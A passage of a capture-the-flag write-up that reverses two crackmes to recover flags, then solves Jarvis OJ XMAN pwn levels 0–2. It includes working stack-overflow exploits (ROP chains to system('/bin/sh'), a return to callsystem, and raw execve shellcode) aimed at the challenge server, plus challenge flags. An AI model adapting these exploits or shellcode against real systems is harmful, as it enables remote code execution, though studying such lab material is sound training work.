    39, 87, 86, 27, 68, 22, 55, 76, 35, 248, 96, 5, 56, 20, 161, 213,
    238, 220, 72, 100, 247, 8, 63, 249, 145, 243, 155, 222, 122, 32, 43, 186,
    0, 102, 216, 126, 15, 42, 115, 138, 240, 147, 229, 204, 117, 223, 141, 159,
    131, 232, 124, 254, 60, 116, 46, 113, 79, 16, 128, 6, 251, 40, 205, 137,
    199, 83, 54, 188, 19, 184, 201, 110, 255, 26, 91, 211, 132, 160, 168, 154,
    185, 183, 244, 78, 33, 123, 28, 59, 12, 210, 218, 47, 163, 215, 209, 108,
    235, 237, 118, 101, 24, 234, 106, 143, 88, 9, 136, 95, 30, 193, 176, 225,
    198, 197, 194, 239, 134, 162, 192, 11, 70, 58, 187, 50, 67, 236, 230, 13,
    99, 190, 208, 207, 7, 53, 219, 203, 62, 114, 127, 125, 164, 179, 175, 112,
    172, 250, 133, 130, 52, 189, 97, 146, 34, 157, 120, 195, 45, 4, 142, 139]
pwda = [188, 155, 11, 58, 251, 208, 204, 202, 150, 120, 206, 237, 114, 92, 126, 6, 42]
pwdb = [53, 222, 230, 35, 67, 248, 226, 216, 17, 209, 32, 2, 181, 200, 171, 60, 108]
flag = ''
for i in range(0, 17):
    # invert the check: key byte = (lookup[i + pwdb[i]] - pwda[i]) mod 256
    flag += chr(lookup[i + pwdb[i]] - pwda[i] & 255)
flag = flag[::-1]   # the checker reversed the input, so reverse the result back
print(flag)
PCTF{PyC_Cr4ck3r}
0x02 Classical Crackme
Static disassembly directly in 32-bit IDA.
There is a base64 string in it.
Decoding it gives the flag; this one is far too easy.
PCTF{Ea5y_Do_Net_Cr4ck3r}
Pwn
Having just fallen into the pwn pit, it feels like there is a lot to learn; let's start here.
0x01 [XMAN]level0
First static analysis with IDA; checksec shows the stack is non-executable.
ssize_t vulnerable_function()
{
    char buf; // [sp+0h] [bp-80h]@1
    return read(0, &buf, 0x200uLL);
}
An obvious stack overflow through read.
The system function and the /bin/sh string are also present, but the argument cannot be passed to system, because this program passes arguments in registers rather than on the stack.
Used ropper to find the address of pop edi; ret.
Construct the exploit directly:
from pwn import *

level0 = ELF('./level0')
systemplt = level0.plt['system']
print(hex(systemplt))
system = 0x400460
# 0x0000000000400663 pop edi ret
sh = remote('pwn2.jarvisoj.com', 9881)
padding = b"A"*0x88
addr = p64(0x400663)
argv = p64(0x400684)   # /bin/sh
shellcode = padding + addr + argv + p64(system)
sh.send(shellcode)
sh.interactive()
Look for another way.
Found the callsystem function; just use it directly.
from pwn import *

sh = remote('pwn2.jarvisoj.com', 9881)
padding = b"A"*0x88
addr = p64(0x400596)
shellcode = padding + addr
sh.send(shellcode)
sh.interactive()
from zio import *

sh = zio(('pwn2.jarvisoj.com', 9881))   # note the extra parentheses
padding = "A"*0x88
addr = l64(0x400596)
shellcode = padding + addr
sh.write(shellcode)
sh.interact()
0x02 [XMAN]level1
Again, start from IDA's decompiled code:
ssize_t vulnerable_function()
{
    char buf; // [sp+0h] [bp-88h]@1
    printf("What's this:%p?\n", &buf);
    return read(0, &buf, 0x100u);
}
There is an obvious stack overflow. Without a libc file there is no system function address to use directly, so we need to write our own shellcode; but where to put it? The program prints the address of the buf array, so the shellcode can be written there.
from zio import *

sh = zio(('pwn2.jarvisoj.com', 9877))
s = sh.readline()
padding = 0x88+4
shellcode = "\x31\xc0\x31\xdb\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\x51\x52\x55\x89\xe5\x0f\x34\x31\xc0\x31\xdb\xfe\xc0\x51\x52\x55\x89\xe5\x0f\x34"
addr = l32(int(s[len("What's this:"):-2], 16))   # parse the leaked buf address
ex = shellcode + 'A'*(padding-len(shellcode)) + addr
sh.write(ex)
sh.interact()
0x03 [XMAN]level2_x64
This challenge is similar to level0.
View it in IDA:
.text:00000000004005F6 push rbp
.text:00000000004005F7 mov rbp, rsp
.text:00000000004005FA add rsp, 0FFFFFFFFFFFFFF80h
.text:00000000004005FE mov edi, offset command ; "echo Input:"
.text:0000000000400603 call _system
.text:0000000000400608 lea rax, [rbp+buf]
.text:000000000040060C mov edx, 200h ; nbytes
.text:0000000000400611 mov rsi, rax ; buf
.text:0000000000400614 mov edi, 0 ; fd
.text:0000000000400619 call _read
.text:000000000040061E leave
.text:000000000040061F retn
.text:000000000040061F vulnerable_function endp
A typical stack overflow.
Again found the addresses of system and /bin/sh.
from pwn import *

level0 = ELF('./level2_x64')
systemplt = level0.plt['system']
print(hex(systemplt))
system = 0x4004c0
# 0x00000000004006b3: pop rdi; ret;
sh = remote('pwn2.jarvisoj.com', 9882)
padding = b"A"*0x88
addr = p64(0x4006b3)
argv = p64(0x600a90)   # /bin/sh
shellcode = padding + addr + argv + p64(system)
sh.send(shellcode)
sh.interactive()